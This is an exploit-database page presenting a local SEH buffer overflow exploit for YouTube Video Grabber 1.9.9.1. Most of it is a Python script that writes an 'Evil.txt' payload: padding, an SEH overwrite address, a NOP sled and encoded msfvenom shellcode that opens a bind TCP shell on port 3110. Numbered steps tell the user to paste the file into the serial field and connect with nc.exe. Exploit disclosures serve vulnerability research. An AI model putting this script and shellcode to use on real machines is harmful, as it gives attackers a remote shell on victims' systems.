YouTube Video Grabber 1.9.9.1 Buffer Overflow

2021.11.02
Credit: Achilles
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH) # Date: 01.11.2021 # Software Link: https://www.litexmedia.com/ytgrabber.exe # Exploit Author: Achilles # Tested Version: 1.9.9.1 # Tested on: Windows 7 64bit # 1.- Run python code : YouTube.py # 2.- Open EVIL.txt and copy All content to Clipboard # 3.- Open YouTube Video Grabber and press Enter Code # 4.- Paste the Content of EVIL.txt into the 'Name and Serial Nummer' # 5.- Click 'OK' # 6.- Nc.exe Local IP Port 3110 and you will have a bind shell # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 712 nseh = "\xEB\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x01c5642e) #pop ecx # pop ecx # ret | {PAGE_EXECUTE_WRITECOPY} [YouTubeGrabber.exe nops = "\x90" * 20 #msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d\x20" buf = b"" buf += b"\x89\xe1\xd9\xc6\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x49\x78\x6e" buf += b"\x62\x63\x30\x37\x70\x63\x30\x71\x70\x6d\x59\x4d\x35" buf += b"\x56\x51\x6f\x30\x61\x74\x6c\x4b\x72\x70\x46\x50\x6e" buf += b"\x6b\x43\x62\x56\x6c\x6c\x4b\x30\x52\x35\x44\x4c\x4b" buf += b"\x31\x62\x54\x68\x74\x4f\x6e\x57\x42\x6a\x31\x36\x75" buf += b"\x61\x49\x6f\x4e\x4c\x65\x6c\x50\x61\x33\x4c\x43\x32" buf += b"\x36\x4c\x67\x50\x69\x51\x5a\x6f\x66\x6d\x47\x71\x5a" buf += b"\x67\x4b\x52\x79\x62\x36\x32\x56\x37\x6e\x6b\x62\x72" buf += b"\x44\x50\x4c\x4b\x51\x5a\x67\x4c\x6c\x4b\x52\x6c\x34" buf += b"\x51\x32\x58\x5a\x43\x70\x48\x66\x61\x48\x51\x63\x61" buf += b"\x6e\x6b\x31\x49\x31\x30\x65\x51\x38\x53\x4e\x6b\x50" buf += b"\x49\x45\x48\x6a\x43\x77\x4a\x57\x39\x6c\x4b\x57\x44" buf += b"\x6c\x4b\x76\x61\x4a\x76\x76\x51\x39\x6f\x6e\x4c\x4a" buf += b"\x61\x5a\x6f\x34\x4d\x66\x61\x58\x47\x47\x48\x6d\x30" buf += b"\x63\x45\x4a\x56\x54\x43\x71\x6d\x39\x68\x37\x4b\x71" buf += b"\x6d\x57\x54\x62\x55\x68\x64\x56\x38\x6c\x4b\x30\x58" buf += b"\x31\x34\x73\x31\x48\x53\x53\x56\x6e\x6b\x76\x6c\x52" buf += b"\x6b\x6c\x4b\x32\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b" buf += b"\x77\x74\x4c\x4b\x65\x51\x38\x50\x6e\x69\x77\x34\x56" buf += b"\x44\x65\x74\x31\x4b\x33\x6b\x50\x61\x42\x79\x73\x6a" buf += b"\x30\x51\x6b\x4f\x4d\x30\x63\x6f\x61\x4f\x33\x6a\x6e" buf += b"\x6b\x56\x72\x78\x6b\x4e\x6d\x61\x4d\x31\x78\x47\x43" buf += b"\x46\x52\x37\x70\x75\x50\x52\x48\x62\x57\x70\x73\x45" buf += b"\x62\x43\x6f\x42\x74\x63\x58\x50\x4c\x62\x57\x55\x76" buf += b"\x36\x67\x59\x6f\x4a\x75\x6e\x58\x4c\x50\x37\x71\x75" buf += b"\x50\x67\x70\x51\x39\x39\x54\x46\x34\x62\x70\x42\x48" buf += b"\x44\x69\x4f\x70\x30\x6b\x75\x50\x59\x6f\x48\x55\x32" buf += b"\x4a\x53\x38\x76\x39\x50\x50\x69\x72\x59\x6d\x37\x30" buf += b"\x70\x50\x37\x30\x50\x50\x61\x78\x69\x7a\x54\x4f\x4b" buf += b"\x6f\x59\x70\x59\x6f\x58\x55\x4e\x77\x31\x78\x34\x42" buf += b"\x57\x70\x66\x6c\x74\x66\x4e\x69\x59\x76\x73\x5a\x44" buf += b"\x50\x71\x46\x71\x47\x33\x58\x6a\x62\x79\x4b\x30\x37" buf += b"\x50\x67\x59\x6f\x79\x45\x56\x37\x70\x68\x4d\x67\x39" buf += b"\x79\x67\x48\x6b\x4f\x79\x6f\x4b\x65\x36\x37\x71\x78" buf += b"\x44\x34\x68\x6c\x55\x6b\x38\x61\x69\x6f\x5a\x75\x70" buf += b"\x57\x6d\x47\x75\x38\x42\x55\x42\x4e\x32\x6d\x71\x71" buf += b"\x6b\x4f\x4a\x75\x62\x48\x71\x73\x52\x4d\x61\x74\x55" buf += b"\x50\x6d\x59\x68\x63\x73\x67\x63\x67\x61\x47\x76\x51" buf += b"\x5a\x56\x32\x4a\x75\x42\x51\x49\x63\x66\x59\x72\x79" buf += b"\x6d\x43\x56\x78\x47\x37\x34\x57\x54\x65\x6c\x46\x61" buf += b"\x67\x71\x6e\x6d\x43\x74\x76\x44\x64\x50\x4b\x76\x67" buf += b"\x70\x70\x44\x42\x74\x50\x50\x52\x76\x30\x56\x63\x66" buf += b"\x42\x66\x52\x76\x52\x6e\x36\x36\x51\x46\x46\x33\x46" buf += b"\x36\x42\x48\x44\x39\x6a\x6c\x35\x6f\x6e\x66\x59\x6f" buf += b"\x78\x55\x6d\x59\x4b\x50\x32\x6e\x62\x76\x42\x66\x6b" buf += b"\x4f\x36\x50\x75\x38\x63\x38\x6f\x77\x65\x4d\x51\x70" buf += b"\x39\x6f\x49\x45\x6d\x6b\x59\x70\x65\x4d\x67\x5a\x54" buf += b"\x4a\x35\x38\x4d\x76\x6c\x55\x6f\x4d\x6d\x4d\x4b\x4f" buf += b"\x68\x55\x35\x6c\x56\x66\x53\x4c\x35\x5a\x6b\x30\x69" buf += b"\x6b\x59\x70\x50\x75\x37\x75\x6d\x6b\x72\x67\x32\x33" buf += b"\x33\x42\x70\x6f\x43\x5a\x37\x70\x31\x43\x79\x6f\x79" buf += b"\x45\x41\x41" pad ="B" * (7280 - len(buffer) - len(nseh+seh) - len(nops) -len(buf)) payload = buffer + nseh + seh + nops + buf + pad try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top